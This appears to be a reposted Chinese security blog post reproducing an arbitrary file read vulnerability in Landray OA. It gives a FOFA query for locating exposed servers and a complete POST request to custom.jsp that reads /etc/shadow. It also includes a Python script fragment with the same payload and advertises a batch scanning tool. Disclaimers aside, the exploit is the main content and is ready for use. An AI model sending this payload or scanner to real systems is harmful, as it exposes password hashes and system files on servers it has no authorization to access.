免责声明:
由于传播、利用此文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本文作者不为此承担任何责任。切勿用于未授权测试!本文主要来自日常学习记录!
FOFA语句:
app="Landray-OA"
漏洞相关介绍:
深圳市蓝凌软件股份有限公司成立于2001年,生态OA引领者、数字化工作专业服务商、阿里云知识管理与协同领域首家战略合作伙伴,为各类组织提供智能办公、移动门户、知识管理、合同管理、数字运营、财务共享等一体化解决方案,近期Landray-OA系统被爆出存任意文件读取漏洞。
漏洞POC分析:
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
var={"body":{"file":"file:///etc/shadow"}}
漏洞利用截图:
脚本部分代码:
target = url+"/sys/ui/extend/varkind/custom.jsp"
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'Accept-Encoding': 'gzip',
}
data = 'var={"body":{"file":"file:///etc/shadow"}}'
脚本利用截图:
支持批量扫描,单个扫描!
获取脚本回复:蓝凌OA
本文始发于微信公众号(Fight Tigers Team):漏洞复现-蓝凌OA文件读取
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论